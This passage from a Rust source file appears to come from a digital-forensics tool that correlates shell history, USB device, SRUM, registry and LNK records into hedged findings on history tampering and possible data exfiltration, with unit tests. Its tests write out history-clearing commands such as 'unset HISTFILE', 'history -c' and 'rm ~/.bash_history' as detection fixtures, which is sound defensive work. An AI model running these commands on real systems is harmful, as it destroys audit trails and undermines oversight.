837    dev_id: &str,
838    src: &Source,
839) -> Finding {
840    Finding::observation(
841        Severity::Low,
842        Category::Threat,
843        "USERACT-EXEC-DURING-REMOVABLE-MEDIA",
844    )
845    .source(src.clone())
846    .note(format!(
847        "the command {cmd:?} ran within {REMOVABLE_MEDIA_WINDOW_SECS}s of removable mass-storage \
848         device {dev_id:?} being connected; consistent with activity involving external media \
849         (MITRE T1052 / T1091)"
850    ))
851    .evidence("command", cmd.to_string())
852    .evidence("device", dev_id.to_string())
853    .evidence("command_epoch", cmd_ts.to_string())
854    .evidence("device_epoch", dev_ts.to_string())
855    .external_ref(ExternalRef::mitre_attack("T1052"))
856    .external_ref(ExternalRef::mitre_attack("T1091"))
857    .build()
858}
859
860/// Recover the `bytes_sent` value a SRUM network-usage activity advertises in its
861/// `detail` (the `<n>\u{2191} …` prefix [`from_srum`] writes). Returns `None` for
862/// any non-network SRUM activity (e.g. an app-usage row).
863fn srum_network_bytes_sent(activity: &UserActivity) -> Option<u64> {
864    let prefix = activity.detail.split('\u{2191}').next()?;
865    prefix.trim().parse::<u64>().ok()
866}
867
868fn network_exfil_volume_finding(event: &UserActivity, bytes_sent: u64, src: &Source) -> Finding {
869    let app = match &event.subject {
870        Subject::Command(c) => c.as_str(),
871        _ => event.detail.as_str(), // cov:unreachable: caller is a SRUM network row, always Subject::Command
872    };
873    let actor = event.actor.as_deref().unwrap_or("(unattributed)");
874    Finding::observation(
875        Severity::Medium,
876        Category::Threat,
877        "USERACT-NETWORK-EXFIL-VOLUME",
878    )
879    .source(src.clone())
880    .note(format!(
881        "SRUM records {bytes_sent} bytes sent in one interval by {app:?} attributed to user \
882         {actor:?}; the volume exceeds the {NETWORK_EXFIL_BYTES_THRESHOLD}-byte lead threshold and \
883         is consistent with bulk data exfiltration (MITRE T1048 / T1052) — a graded lead for the \
884         examiner, not a verdict"
885    ))
886    .evidence("application", app.to_string())
887    .evidence("actor", actor.to_string())
888    .evidence("bytes_sent", bytes_sent.to_string())
889    .external_ref(ExternalRef::mitre_attack("T1048"))
890    .external_ref(ExternalRef::mitre_attack("T1052"))
891    .build()
892}
893
894fn file_on_external_device_finding(
895    device: &UserActivity,
896    file: &UserActivity,
897    src: &Source,
898) -> Finding {
899    let path = match &file.subject {
900        Subject::File { path, .. } | Subject::Folder { path, .. } => path.as_str(),
901        _ => file.detail.as_str(), // cov:unreachable: join only pairs File/Folder subjects here
902    };
903    let dev_id = match &device.subject {
904        Subject::Device { id, .. } => id.as_str(),
905        _ => device.detail.as_str(), // cov:unreachable: join only pairs Device subjects here
906    };
907    let serial = match &device.subject {
908        Subject::Device {
909            volume_serial: Some(s),
910            ..
911        } => *s,
912        _ => 0, // cov:unreachable: join requires Device { volume_serial: Some(_) }
913    };
914    Finding::observation(
915        Severity::Medium,
916        Category::Threat,
917        "USERACT-FILE-ON-EXTERNAL-DEVICE",
918    )
919    .source(src.clone())
920    .note(format!(
921        "a user accessed {path:?} on a volume (serial {serial:#010x}) whose serial matches the \
922         connected external device {dev_id:?}; consistent with data movement to/from removable \
923         media (MITRE T1052 / T1091)"
924    ))
925    .evidence("file", path.to_string())
926    .evidence("device", dev_id.to_string())
927    .evidence("volume_serial", format!("{serial:#010x}"))
928    .external_ref(ExternalRef::mitre_attack("T1052"))
929    .external_ref(ExternalRef::mitre_attack("T1091"))
930    .build()
931}
932
933#[cfg(test)]
934mod tests {
935    use super::*;
936    use peripheral_core::{Bus, Provenance, Stamp};
937    use shellhist_core::{HistoryEntry, Shell};
938
939    fn entry(cmd: &str, ts: Option<i64>) -> HistoryEntry {
940        HistoryEntry {
941            shell: Shell::Bash,
942            command: cmd.to_string(),
943            timestamp: ts,
944            elapsed: None,
945            paths: Vec::new(),
946        }
947    }
948
949    fn device(
950        instance_id: &str,
951        bus: Bus,
952        first_install: Option<i64>,
953        vol: Option<u32>,
954    ) -> DeviceConnection {
955        DeviceConnection {
956            bus,
957            device_class_guid: None,
958            vid: None,
959            pid: None,
960            device_serial: None,
961            serial_is_os_generated: false,
962            friendly_name: None,
963            device_instance_id: instance_id.to_string(),
964            first_install: first_install.map(Stamp::authoritative),
965            last_install: None,
966            last_arrival: None,
967            last_removal: None,
968            parent_id_prefix: None,
969            volume_guid: None,
970            drive_letter: None,
971            volume_serial: vol,
972            disk_signature: None,
973            dma_capable: bus.is_dma_capable(),
974            mitre: Vec::new(),
975            source: Provenance {
976                file: "setupapi.dev.log".to_string(),
977                line: 1,
978            },
979        }
980    }
981
982    // ── from_shell_history ────────────────────────────────────────────────────
983
984    #[test]
985    fn shell_command_becomes_executed_activity() {
986        let entries = [entry("ls -la /tmp", Some(1_700_000_000))];
987        let acts = from_shell_history(&entries, None);
988        assert_eq!(acts.len(), 1);
989        assert_eq!(acts[0].action, Action::Executed);
990        assert_eq!(acts[0].source, SourceKind::ShellHistory);
991        assert_eq!(acts[0].timestamp, Some(1_700_000_000));
992        assert_eq!(acts[0].subject, Subject::Command("ls -la /tmp".to_string()));
993        assert_eq!(acts[0].actor, None);
994    }
995
996    #[test]
997    fn shell_actor_is_carried_when_known() {
998        let entries = [entry("whoami", None)];
999        let acts = from_shell_history(&entries, Some("alice"));
1000        assert_eq!(acts[0].actor.as_deref(), Some("alice"));
1001    }
1002
1003    #[test]
1004    fn history_clearing_command_becomes_tampered() {
1005        for cmd in [
1006            "unset HISTFILE",
1007            "history -c",
1008            "export HISTFILE=/dev/null",
1009            "Clear-History",
1010            "rm ~/.bash_history",
1011        ] {
1012            let entries = [entry(cmd, Some(1))];
1013            let acts = from_shell_history(&entries, None);
1014            assert_eq!(acts[0].action, Action::HistoryTampered);
1015        }
1016    }
1017
1018    #[test]
1019    fn benign_command_is_not_tampered() {
1020        let entries = [entry("git log --oneline", Some(1))];
1021        let acts = from_shell_history(&entries, None);
1022        assert_eq!(acts[0].action, Action::Executed);
1023    }
1024
1025    // ── from_device_connections ───────────────────────────────────────────────
1026
1027    #[test]
1028    fn device_becomes_connected_with_volume_serial() {
1029        let conns = [device(
1030            "USBSTOR\\Disk&Ven_SanDisk\\1234567890AB",
1031            Bus::Usb,
1032            Some(1_700_000_500),
1033            Some(0xDEAD_BEEF),
1034        )];
1035        let acts = from_device_connections(&conns);
1036        assert_eq!(acts.len(), 1);
1037        assert_eq!(acts[0].action, Action::Connected);
1038        assert_eq!(acts[0].source, SourceKind::PeripheralDevice);
1039        assert_eq!(acts[0].timestamp, Some(1_700_000_500));
1040        assert_eq!(
1041            acts[0].subject,
1042            Subject::Device {
1043                id: "USBSTOR\\Disk&Ven_SanDisk\\1234567890AB".to_string(),
1044                volume_serial: Some(0xDEAD_BEEF),
1045            }
1046        );
1047    }
1048
1049    #[test]
1050    fn device_timestamp_falls_back_through_stamps() {
1051        let mut conn = device("USB\\VID_0781", Bus::Usb, None, None);
1052        conn.last_arrival = Some(Stamp::inferred(42));
1053        let acts = from_device_connections(&[conn]);
1054        assert_eq!(acts[0].timestamp, Some(42));
1055    }
1056
1057    #[test]
1058    fn device_without_any_stamp_has_no_timestamp() {
1059        let conn = device("USB\\VID_0781", Bus::Usb, None, None);
1060        let acts = from_device_connections(&[conn]);
1061        assert_eq!(acts[0].timestamp, None);
1062    }
1063
1064    // ── build_timeline ────────────────────────────────────────────────────────
1065
1066    #[test]
1067    fn timeline_merges_and_sorts_by_timestamp() {
1068        let entries = [entry("late", Some(300)), entry("early", Some(100))];
1069        let conns = [device("USBSTOR\\x", Bus::Usb, Some(200), None)];
1070        let shell = ShellHistorySource::new(&entries);
1071        let devices = DeviceSource::new(&conns);
1072        let tl = build_timeline(&[&shell, &devices]);
1073        let ts: Vec<Option<i64>> = tl.iter().map(|e| e.timestamp).collect();
1074        assert_eq!(ts, vec![Some(100), Some(200), Some(300)]);
1075    }
1076
1077    #[test]
1078    fn timeline_orders_untimestamped_events_last_and_stably() {
1079        let entries = [
1080            entry("no_ts_a", None),
1081            entry("ts", Some(50)),
1082            entry("no_ts_b", None),
1083        ];
1084        let shell = ShellHistorySource::new(&entries);
1085        let tl = build_timeline(&[&shell]);
1086        assert_eq!(tl[0].timestamp, Some(50));
1087        assert_eq!(tl[1].detail, "no_ts_a");
1088        assert_eq!(tl[2].detail, "no_ts_b");
1089    }
1090
1091    // ── audit: USERACT-HISTORY-TAMPERED ───────────────────────────────────────
1092
1093    #[test]
1094    fn audit_surfaces_history_tampered() {
1095        let entries = [entry("unset HISTFILE", Some(10))];
1096        let acts = from_shell_history(&entries, None);
1097        let findings = audit(&acts);
1098        let f = findings
1099            .iter()
1100            .find(|f| f.code == "USERACT-HISTORY-TAMPERED")
1101            .expect("history-tampered finding must fire");
1102        assert_eq!(f.severity, Some(Severity::Medium));
1103        assert_eq!(f.category, Category::Concealment);
1104    }
1105
1106    // ── audit: USERACT-EXEC-DURING-REMOVABLE-MEDIA ────────────────────────────
1107
1108    #[test]
1109    fn audit_fires_exec_during_removable_media_within_window() {
1110        let entries = [entry("tar czf /media/usb/out.tgz .", Some(1_000))];
1111        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1_500), None)];
1112        let shell = ShellHistorySource::new(&entries);
1113        let devices = DeviceSource::new(&conns);
1114        let tl = build_timeline(&[&shell, &devices]);
1115        let findings = audit(&tl);
1116        assert!(findings
1117            .iter()
1118            .any(|f| f.code == "USERACT-EXEC-DURING-REMOVABLE-MEDIA"));
1119    }
1120
1121    #[test]
1122    fn audit_does_not_fire_outside_window() {
1123        let entries = [entry("ls", Some(1_000))];
1124        let conns = [device(
1125            "USBSTOR\\Disk",
1126            Bus::Usb,
1127            Some(1_000 + REMOVABLE_MEDIA_WINDOW_SECS + 1),
1128            None,
1129        )];
1130        let shell = ShellHistorySource::new(&entries);
1131        let devices = DeviceSource::new(&conns);
1132        let tl = build_timeline(&[&shell, &devices]);
1133        let findings = audit(&tl);
1134        assert!(findings
1135            .iter()
1136            .all(|f| f.code != "USERACT-EXEC-DURING-REMOVABLE-MEDIA"));
1137    }
1138
1139    #[test]
1140    fn audit_does_not_fire_for_non_mass_storage_device() {
1141        // A Bluetooth HID device is NOT mass storage → no exec-during-media finding.
1142        let entries = [entry("ls", Some(1_000))];
1143        let conns = [device("BTHENUM\\Dev", Bus::Bluetooth, Some(1_000), None)];
1144        let shell = ShellHistorySource::new(&entries);
1145        let devices = DeviceSource::new(&conns);
1146        let tl = build_timeline(&[&shell, &devices]);
1147        let findings = audit(&tl);
1148        assert!(findings
1149            .iter()
1150            .all(|f| f.code != "USERACT-EXEC-DURING-REMOVABLE-MEDIA"));
1151    }
1152
1153    #[test]
1154    fn audit_with_custom_source_stamps_scope() {
1155        let entries = [entry("history -c", Some(1))];
1156        let acts = from_shell_history(&entries, None);
1157        let findings = audit_with(&acts, &source("CASE-001/host-7"));
1158        let f = &findings[0];
1159        assert_eq!(f.source.scope, "CASE-001/host-7");
1160        assert_eq!(f.source.analyzer, "useract-forensic");
1161    }
1162
1163    // ── findings are observations, never verdicts ─────────────────────────────
1164
1165    #[test]
1166    fn findings_are_hedged_observations_never_verdicts() {
1167        let entries = [
1168            entry("unset HISTFILE", Some(1_000)),
1169            entry("cp x /media/usb", Some(1_010)),
1170        ];
1171        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1_005), None)];
1172        let shell = ShellHistorySource::new(&entries);
1173        let devices = DeviceSource::new(&conns);
1174        let tl = build_timeline(&[&shell, &devices]);
1175        let findings = audit(&tl);
1176        assert!(!findings.is_empty());
1177        for f in &findings {
1178            let note = f.note.to_ascii_lowercase();
1179            assert!(!note.contains("proves"));
1180            assert!(!note.contains("confirms"));
1181            assert!(!note.contains("definitely"));
1182            assert!(note.contains("consistent with"));
1183        }
1184    }
1185
1186    // ── volume-serial join seam (v0.2 activation, proven by construction) ──────
1187
1188    #[test]
1189    fn volume_serial_join_is_empty_for_v01_sources() {
1190        // v0.1 emits no File/Folder subjects carrying a volume serial → no joins.
1191        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1), Some(0x1234))];
1192        let acts = from_device_connections(&conns);
1193        assert!(device_file_volume_joins(&acts).is_empty());
1194    }
1195
1196    #[test]
1197    fn volume_serial_join_lights_up_for_a_v02_style_file_event() {
1198        // A synthetic v0.2-shape File activity advertising the same volume serial as
1199        // a connected device joins to it — proving the seam is correct by construction.
1200        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1), Some(0x1234))];
1201        let mut acts = from_device_connections(&conns);
1202        acts.push(UserActivity {
1203            timestamp: Some(2),
1204            actor: None,
1205            action: Action::Accessed,
1206            subject: Subject::file("\\\\?\\E:\\secret.docx"),
1207            source: SourceKind::PeripheralDevice, // placeholder
1208            detail: "opened E:\\secret.docx vol:4660".to_string(), // 0x1234 == 4660
1209        });
1210        let joins = device_file_volume_joins(&acts);
1211        assert_eq!(joins, vec![(0, 1)]);
1212    }
1213
1214    #[test]
1215    fn volume_serial_join_ignores_mismatched_serials() {
1216        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1), Some(0x1234))];
1217        let mut acts = from_device_connections(&conns);
1218        acts.push(UserActivity {
1219            timestamp: Some(2),
1220            actor: None,
1221            action: Action::Accessed,
1222            subject: Subject::file("x"),
1223            source: SourceKind::PeripheralDevice,
1224            detail: "vol:9999".to_string(),
1225        });
1226        assert!(device_file_volume_joins(&acts).is_empty());
1227    }
1228
1229    #[test]
1230    fn volume_serial_join_skips_files_without_a_volume_token() {
1231        // A folder activity that advertises no `vol:` token never joins (the
1232        // file_volume_serial None path).
1233        let conns = [device("USBSTOR\\Disk", Bus::Usb, Some(1), Some(0x1234))];
1234        let mut acts = from_device_connections(&conns);
1235        acts.push(UserActivity {
1236            timestamp: Some(2),
1237            actor: None,
1238            action: Action::Accessed,
1239            subject: Subject::folder("E:\\photos"),
1240            source: SourceKind::PeripheralDevice,
1241            detail: "opened folder with no serial hint".to_string(),
1242        });
1243        // And a file whose `vol:` token is non-numeric (parse Err path) also never joins.
1244        acts.push(UserActivity {
1245            timestamp: Some(3),
1246            actor: None,
1247            action: Action::Accessed,
1248            subject: Subject::file("E:\\x"),
1249            source: SourceKind::PeripheralDevice,
1250            detail: "vol:notanumber".to_string(),
1251        });
1252        assert!(device_file_volume_joins(&acts).is_empty());
1253    }
1254
1255    #[test]
1256    fn history_tampered_finding_falls_back_to_detail_for_non_command_subject() {
1257        // Defensive: a HistoryTampered activity whose subject is not a Command still
1258        // produces a finding, using detail for the command text.
1259        let act = UserActivity {
1260            timestamp: Some(1),
1261            actor: None,
1262            action: Action::HistoryTampered,
1263            subject: Subject::file("ConsoleHost_history.txt"),
1264            source: SourceKind::ShellHistory,
1265            detail: "Remove-Item ConsoleHost_history.txt".to_string(),
1266        };
1267        let findings = audit(&[act]);
1268        assert_eq!(findings.len(), 1);
1269        assert_eq!(findings[0].code, "USERACT-HISTORY-TAMPERED");
1270        assert!(findings[0]
1271            .note
1272            .contains("Remove-Item ConsoleHost_history.txt"));
1273    }
1274
1275    #[test]
1276    fn is_mass_storage_id_classifies_bare_and_separated_ids() {
1277        assert!(is_mass_storage_id("USBSTOR\\Disk&Ven"));
1278        assert!(is_mass_storage_id("USBSTOR"));
1279        assert!(!is_mass_storage_id("BTHENUM\\Dev"));
1280        assert!(!is_mass_storage_id(""));
1281    }
1282
1283    #[test]
1284    fn activitysource_trait_dispatches() {
1285        let entries = [entry("ls", Some(1))];
1286        let s = ShellHistorySource::for_actor(&entries, "bob");
1287        let acts: Vec<UserActivity> = s.activities();
1288        assert_eq!(acts[0].actor.as_deref(), Some("bob"));
1289    }
1290
1291    // ── SRUM adapter (v0.2) ───────────────────────────────────────────────────
1292
1293    use srum_core::{AppUsageRecord, IdMapEntry, NetworkUsageRecord};
1294
1295    fn utc(epoch: i64) -> chrono::DateTime<chrono::Utc> {
1296        chrono::DateTime::from_timestamp(epoch, 0).expect("valid epoch")
1297    }
1298
1299    #[test]
1300    fn srum_network_row_is_executed_and_actor_attributed() {
1301        // user_id and app_id are integers resolved through the id-map.
1302        let id_map = [
1303            IdMapEntry {
1304                id: 7,
1305                name: "S-1-5-21-1-2-3-1001".to_string(),
1306            },
1307            IdMapEntry {
1308                id: 42,
1309                name: "\\Device\\HarddiskVolume3\\Windows\\explorer.exe".to_string(),
1310            },
1311        ];
1312        let net = [NetworkUsageRecord {
1313            app_id: 42,
1314            user_id: 7,
1315            timestamp: utc(1_700_000_000),
1316            bytes_sent: 4096,
1317            bytes_recv: 1024,
1318            auto_inc_id: 0,
1319        }];
1320        let acts = from_srum(&net, &[], &id_map);
1321        assert_eq!(acts.len(), 1);
1322        let a = &acts[0];
1323        assert_eq!(a.action, Action::Executed);
1324        assert_eq!(a.source, SourceKind::Srum);
1325        assert_eq!(a.timestamp, Some(1_700_000_000));
1326        // First source that ATTRIBUTES to a specific user SID.
1327        assert_eq!(a.actor.as_deref(), Some("S-1-5-21-1-2-3-1001"));
1328        // App resolves through the id-map.
1329        assert_eq!(
1330            a.subject,
1331            Subject::Command("\\Device\\HarddiskVolume3\\Windows\\explorer.exe".to_string())
1332        );
1333        // Network volume surfaced in the detail.
1334        assert!(a.detail.contains("4096"));
1335        assert!(a.detail.contains("1024"));
1336    }
1337
1338    #[test]
1339    fn srum_unresolved_user_id_falls_back_to_numeric_token() {
1340        // No id-map entry for the user → actor is a stable synthetic token, never lost.
1341        let net = [NetworkUsageRecord {
1342            app_id: 1,
1343            user_id: 99,
1344            timestamp: utc(10),
1345            bytes_sent: 1,
1346            bytes_recv: 2,
1347            auto_inc_id: 0,
1348        }];
1349        let acts = from_srum(&net, &[], &[]);
1350        assert_eq!(acts.len(), 1);
1351        assert_eq!(acts[0].actor.as_deref(), Some("user-id:99"));
1352        // App also falls back when unresolved.
1353        assert_eq!(acts[0].subject, Subject::Command("app-id:1".to_string()));
1354    }
1355
1356    #[test]
1357    fn srum_app_usage_row_is_executed_and_actor_attributed() {
1358        let id_map = [
1359            IdMapEntry {
1360                id: 5,
1361                name: "S-1-5-21-9-9-9-500".to_string(),
1362            },
1363            IdMapEntry {
1364                id: 8,
1365                name: "C:\\Tools\\rclone.exe".to_string(),
1366            },
1367        ];
1368        let app = [AppUsageRecord {
1369            app_id: 8,
1370            user_id: 5,
1371            timestamp: utc(1_700_000_500),
1372            foreground_cycles: 900_000,
1373            background_cycles: 100,
1374            auto_inc_id: 0,
1375        }];
1376        let acts = from_srum(&[], &app, &id_map);
1377        assert_eq!(acts.len(), 1);
1378        assert_eq!(acts[0].action, Action::Executed);
1379        assert_eq!(acts[0].source, SourceKind::Srum);
1380        assert_eq!(acts[0].actor.as_deref(), Some("S-1-5-21-9-9-9-500"));
1381        assert_eq!(
1382            acts[0].subject,
1383            Subject::Command("C:\\Tools\\rclone.exe".to_string())
1384        );
1385    }
1386
1387    #[test]
1388    fn srum_source_adapter_dispatches() {
1389        let net = [NetworkUsageRecord {
1390            app_id: 1,
1391            user_id: 1,
1392            timestamp: utc(1),
1393            bytes_sent: 1,
1394            bytes_recv: 1,
1395            auto_inc_id: 0,
1396        }];
1397        let s = SrumSource::new(&net, &[], &[]);
1398        let acts = s.activities();
1399        assert_eq!(acts.len(), 1);
1400        assert_eq!(acts[0].source, SourceKind::Srum);
1401    }
1402
1403    // ── audit: USERACT-NETWORK-EXFIL-VOLUME (v0.2) ────────────────────────────
1404
1405    #[test]
1406    fn audit_fires_network_exfil_volume_above_threshold() {
1407        let id_map = [
1408            IdMapEntry {
1409                id: 7,
1410                name: "S-1-5-21-1-2-3-1001".to_string(),
1411            },
1412            IdMapEntry {
1413                id: 42,
1414                name: "rclone.exe".to_string(),
1415            },
1416        ];
1417        let net = [NetworkUsageRecord {
1418            app_id: 42,
1419            user_id: 7,
1420            timestamp: utc(1_700_000_000),
1421            bytes_sent: NETWORK_EXFIL_BYTES_THRESHOLD + 1,
1422            bytes_recv: 0,
1423            auto_inc_id: 0,
1424        }];
1425        let acts = from_srum(&net, &[], &id_map);
1426        let findings = audit(&acts);
1427        let f = findings
1428            .iter()
1429            .find(|f| f.code == "USERACT-NETWORK-EXFIL-VOLUME")
1430            .expect("network-exfil-volume must fire above threshold");
1431        assert_eq!(f.severity, Some(Severity::Medium));
1432        assert_eq!(f.category, Category::Threat);
1433    }
1434
1435    #[test]
1436    fn audit_does_not_fire_network_exfil_below_threshold() {
1437        let net = [NetworkUsageRecord {
1438            app_id: 1,
1439            user_id: 1,
1440            timestamp: utc(1),
1441            bytes_sent: NETWORK_EXFIL_BYTES_THRESHOLD - 1,
1442            bytes_recv: 0,
1443            auto_inc_id: 0,
1444        }];
1445        let acts = from_srum(&net, &[], &[]);
1446        let findings = audit(&acts);
1447        assert!(findings
1448            .iter()
1449            .all(|f| f.code != "USERACT-NETWORK-EXFIL-VOLUME"));
1450    }
1451
1452    #[test]
1453    fn audit_skips_exfil_check_for_srum_app_usage_rows() {
1454        // An app-usage SRUM row carries CPU cycles, not bytes, so its detail has no
1455        // bytes-sent prefix: the exfil check sees None and never fires (regardless
1456        // of how large the cycle counts are).
1457        let app = [AppUsageRecord {
1458            app_id: 1,
1459            user_id: 1,
1460            timestamp: utc(1),
1461            foreground_cycles: u64::MAX,
1462            background_cycles: u64::MAX,
1463            auto_inc_id: 0,
1464        }];
1465        let acts = from_srum(&[], &app, &[]);
1466        let findings = audit(&acts);
1467        assert!(findings
1468            .iter()
1469            .all(|f| f.code != "USERACT-NETWORK-EXFIL-VOLUME"));
1470    }
1471
1472    // ── winreg-artifacts adapter (v0.2) ───────────────────────────────────────
1473
1474    use winreg_artifacts::shellbags::ShellbagEntry;
1475    use winreg_artifacts::typed_urls::TypedUrl;
1476    use winreg_artifacts::userassist::UserAssistEntry;
1477
1478    fn ua(program: &str, run_count: u32, last_run: Option<&str>) -> UserAssistEntry {
1479        UserAssistEntry {
1480            program: program.to_string(),
1481            run_count,
1482            focus_count: 0,
1483            focus_duration_ms: 0,
1484            last_run: last_run.map(ToString::to_string),
1485            guid: "{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}".to_string(),
1486        }
1487    }
1488
1489    #[test]
1490    fn userassist_entry_becomes_executed_with_run_count() {
1491        let entries = [ua(
1492            "C:\\Windows\\System32\\cmd.exe",
1493            5,
1494            Some("2024-06-15T08:00:00Z"),
1495        )];
1496        let acts = from_userassist(&entries, Some("alice"));
1497        assert_eq!(acts.len(), 1);
1498        let a = &acts[0];
1499        assert_eq!(a.action, Action::Executed);
1500        assert_eq!(a.source, SourceKind::Registry);
1501        assert_eq!(
1502            a.subject,
1503            Subject::Command("C:\\Windows\\System32\\cmd.exe".to_string())
1504        );
1505        // ISO last_run is parsed to epoch (2024-06-15T08:00:00Z = 1718438400).
1506        assert_eq!(a.timestamp, Some(1_718_438_400));
1507        assert_eq!(a.actor.as_deref(), Some("alice"));
1508        // Run count carried in detail.
1509        assert!(a.detail.contains('5'));
1510    }
1511
1512    #[test]
1513    fn userassist_without_last_run_has_no_timestamp() {
1514        let entries = [ua("notepad.exe", 1, None)];
1515        let acts = from_userassist(&entries, None);
1516        assert_eq!(acts[0].timestamp, None);
1517        assert_eq!(acts[0].actor, None);
1518    }
1519
1520    #[test]
1521    fn typed_url_becomes_typed_activity() {
1522        let urls = [TypedUrl {
1523            url: "https://pastebin.com/abc".to_string(),
1524            last_visited: Some("2024-01-02T03:04:05Z".to_string()),
1525            is_suspicious: true,
1526            suspicious_reason: Some("suspicious domain: pastebin.com".to_string()),
1527        }];
1528        let acts = from_typed_urls(&urls, None);
1529        assert_eq!(acts.len(), 1);
1530        assert_eq!(acts[0].action, Action::Typed);
1531        assert_eq!(acts[0].source, SourceKind::Registry);
1532        assert_eq!(
1533            acts[0].subject,
1534            Subject::Query("https://pastebin.com/abc".to_string())
1535        );
1536        assert!(acts[0].timestamp.is_some());
1537    }
1538
1539    #[test]
1540    fn shellbag_becomes_accessed_folder() {
1541        let bags = [ShellbagEntry {
1542            path: "BagMRU[slot=0, size=120 bytes]".to_string(),
1543            key_path: "Software\\Microsoft\\Windows\\Shell\\BagMRU\\0".to_string(),
1544            last_written: Some("2024-03-04T05:06:07Z".to_string()),
1545            mru_order: vec!["0".to_string()],
1546        }];
1547        let acts = from_shellbags(&bags, Some("bob"));
1548        assert_eq!(acts.len(), 1);
1549        assert_eq!(acts[0].action, Action::Accessed);
1550        assert_eq!(acts[0].source, SourceKind::Registry);
1551        assert!(matches!(acts[0].subject, Subject::Folder { .. }));
1552        assert_eq!(acts[0].actor.as_deref(), Some("bob"));
1553    }
1554
1555    #[test]
1556    fn from_registry_merges_all_three_registry_artifacts() {
1557        let ua_entries = [ua("cmd.exe", 1, Some("2024-06-15T08:00:00Z"))];
1558        let urls = [TypedUrl {
1559            url: "https://x.test".to_string(),
1560            last_visited: None,
1561            is_suspicious: false,
1562            suspicious_reason: None,
1563        }];
1564        let bags = [ShellbagEntry {
1565            path: "BagMRU[slot=0, size=10 bytes]".to_string(),
1566            key_path: "k".to_string(),
1567            last_written: None,
1568            mru_order: vec![],
1569        }];
1570        let acts = from_registry(&ua_entries, &urls, &bags, Some("alice"));
1571        assert_eq!(acts.len(), 3);
1572        assert!(acts.iter().any(|a| a.action == Action::Executed));
1573        assert!(acts.iter().any(|a| a.action == Action::Typed));
1574        assert!(acts.iter().any(|a| a.action == Action::Accessed));
1575        assert!(acts.iter().all(|a| a.source == SourceKind::Registry));
1576        assert!(acts.iter().all(|a| a.actor.as_deref() == Some("alice")));
1577    }
1578
1579    #[test]
1580    fn registry_source_adapter_dispatches() {
1581        let ua_entries = [ua("cmd.exe", 1, None)];
1582        let s = RegistrySource::new(&ua_entries, &[], &[], None);
1583        let acts = s.activities();
1584        assert_eq!(acts.len(), 1);
1585        assert_eq!(acts[0].source, SourceKind::Registry);
1586    }
1587
1588    // ── LNK adapter (v0.2) ────────────────────────────────────────────────────
1589
1590    use lnk_core::{LinkInfo, ShellLink, ShellLinkHeader, StringData, VolumeId};
1591
1592    fn shell_link(
1593        local_base_path: Option<&str>,
1594        drive_serial: Option<u32>,
1595        write_time: i64,
1596        net_name: Option<&str>,
1597    ) -> ShellLink {
1598        let volume_id = drive_serial.map(|s| VolumeId {
1599            drive_type: lnk_core::drive_type::REMOVABLE,
1600            drive_serial_number: s,
1601            volume_label: None,
1602        });
1603        let cnrl = net_name.map(|n| lnk_core::CommonNetworkRelativeLink {
1604            net_name: Some(n.to_string()),
1605            device_name: None,
1606        });
1607        ShellLink {
1608            header: ShellLinkHeader {
1609                link_flags: 0,
1610                file_attributes: 0,
1611                creation_time: 0,
1612                access_time: 0,
1613                write_time,
1614                file_size: 0,
1615                icon_index: 0,
1616                show_command: 1,
1617                hotkey: 0,
1618            },
1619            link_target_idlist: None,
1620            link_info: Some(LinkInfo {
1621                volume_id,
1622                local_base_path: local_base_path.map(ToString::to_string),
1623                common_network_relative_link: cnrl,
1624            }),
1625            string_data: StringData::default(),
1626            tracker: None,
1627        }
1628    }
1629
1630    #[test]
1631    fn lnk_target_becomes_accessed_file_with_volume_serial() {
1632        let links = [shell_link(
1633            Some("E:\\secret.docx"),
1634            Some(0xDEAD_BEEF),
1635            1_700_000_000,
1636            None,
1637        )];
1638        let acts = from_lnk(&links, Some("alice"));
1639        assert_eq!(acts.len(), 1);
1640        let a = &acts[0];
1641        assert_eq!(a.action, Action::Accessed);
1642        assert_eq!(a.source, SourceKind::LnkFile);
1643        // The target write time becomes the activity timestamp.
1644        assert_eq!(a.timestamp, Some(1_700_000_000));
1645        assert_eq!(a.actor.as_deref(), Some("alice"));
1646        // The File subject carries the structured volume serial (the join key).
1647        assert_eq!(
1648            a.subject,
1649            Subject::File {
1650                path: "E:\\secret.docx".to_string(),
1651                volume_serial: Some(0xDEAD_BEEF),
1652            }
1653        );
1654    }
1655
1656    #[test]
1657    fn lnk_without_volume_id_has_no_serial() {
1658        let links = [shell_link(Some("C:\\x.txt"), None, 0, None)];
1659        let acts = from_lnk(&links, None);
1660        assert_eq!(acts.len(), 1);
1661        assert_eq!(
1662            acts[0].subject,
1663            Subject::File {
1664                path: "C:\\x.txt".to_string(),
1665                volume_serial: None,
1666            }
1667        );
1668        // write_time 0 (the FILETIME "not set" sentinel) → no timestamp.
1669        assert_eq!(acts[0].timestamp, None);
1670    }
1671
1672    #[test]
1673    fn lnk_network_target_falls_back_to_unc_path() {
1674        // No local_base_path, but a CommonNetworkRelativeLink net name → use it.
1675        let links = [shell_link(None, None, 5, Some("\\\\server\\share"))];
1676        let acts = from_lnk(&links, None);
1677        assert_eq!(acts.len(), 1);
1678        assert_eq!(
1679            acts[0].subject,
1680            Subject::File {
1681                path: "\\\\server\\share".to_string(),
1682                volume_serial: None,
1683            }
1684        );
1685    }
1686
1687    #[test]
1688    fn lnk_without_link_info_is_skipped() {
1689        // A link with no LinkInfo and no usable target is dropped, not crashed.
1690        let mut link = shell_link(None, None, 0, None);
1691        link.link_info = None;
1692        let acts = from_lnk(&[link], None);
1693        assert!(acts.is_empty());
1694    }
1695
1696    #[test]
1697    fn lnk_source_adapter_dispatches() {
1698        let links = [shell_link(Some("E:\\f"), Some(1), 1, None)];
1699        let s = LnkSource::new(&links, None);
1700        let acts = s.activities();
1701        assert_eq!(acts.len(), 1);
1702        assert_eq!(acts[0].source, SourceKind::LnkFile);
1703    }
1704
1705    // ── The volume-serial join activates end-to-end (LNK File ⋈ Device) ───────
1706
1707    #[test]
1708    fn lnk_file_joins_connected_device_on_volume_serial() {
1709        let links = [shell_link(
1710            Some("E:\\loot.zip"),
1711            Some(0xCAFE_F00D),
1712            100,
1713            None,
1714        )];
1715        let conns = [device(
1716            "USBSTOR\\Disk",
1717            Bus::Usb,
1718            Some(50),
1719            Some(0xCAFE_F00D),
1720        )];
1721        let lnk = LnkSource::new(&links, Some("alice"));
